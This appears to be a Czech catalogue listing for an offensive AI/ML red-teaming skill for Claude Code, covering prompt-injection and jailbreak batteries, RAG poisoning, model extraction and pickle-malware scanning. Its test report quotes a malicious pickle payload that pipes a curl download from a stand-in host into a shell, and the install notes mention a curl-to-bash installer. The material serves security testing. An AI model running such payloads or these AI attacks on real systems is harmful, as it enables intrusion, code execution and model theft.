AI Security

Ofenzivní testování systémů LLM/ML: prompt injection, RAG poisoning, skenování pickle-modelů

od hypnguyen1209 · hypnguyen1209/offensive-claude

Otestováno · Funguje ★ 9.2/10

AI Security — Ofenzivní testování systémů LLM/ML: prompt injection, RAG poisoning, skenování pickle-modelů

Co umí

Dovednost pro ofenzivní bezpečnost pro red-teaming systémů AI/ML: prompt-injection a multi-turn jailbreak baterie, RAG/vector-DB poisoning, audity MCP/agent tool-poisoning, skenování malware v pickle-modelech před načtením a black-box extrakce modelu/sondy pro inferenci členství, s mapováním na OWASP LLM Top-10 a MITRE ATLAS. Spouští se, když uživatel požádá o útok, red-teaming nebo audit LLM, chatbota, RAG pipeline, MCP serveru nebo staženého artefaktu modelu. Dodává pět spustitelných Python skriptů plus pět referenčních hloubkových analýz vázaných na konkrétní CVE z let 2024-2025.

Testovací report

Načten skills/ai-security/SKILL.md a namátkově zkontrolovány 3 přibalené soubory (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — všechny HTTP 200. Pro VÝSTUP jsem spustil skripty dovednosti pouze ze stdlib scripts/model_scan.py proti pickle souborům, které jsem vytvořil: jeden škodlivý s __reduce__ -> os.system("curl http://evil.tld/x | sh"), jeden benigní a jeden benigní, jehož data obsahovala pouze řetězce "operating_system"/"subprocess". Základní linie (naivní byte-grep) označila škodlivý soubor, ale také FALSE-POSITIVED benigní soubor se seznamem štítků. Dovednost rozebrala pickle opcodes pomocí pickletools, vyřešila posix.system přes REDUCE-reachability jako zakázanou volatelnost (strukturovaný JSONL: severity high, CWE-502, AML.T0011, exit code 2 jako CI brána) a správně vyčistila oba benigní soubory. Ověřena instalace do čistého mktemp HOME umístěním SKILL.md do ~/.claude/skills/ai-security/SKILL.md.

Testováno: 2026-07-31 · Claude Code 2.x (agent harness)

Instalace

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Příkazy a ukázkové prompty

  • /ai-securityOfenzivní testování systémů LLM/ML: prompt injection, RAG poisoning, skenování pickle-modelů

Skilly se spouštějí běžnými požadavky — žádné příkazy k zapamatování. Po instalaci ho aktivují prompty jako tyto (anglicky):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API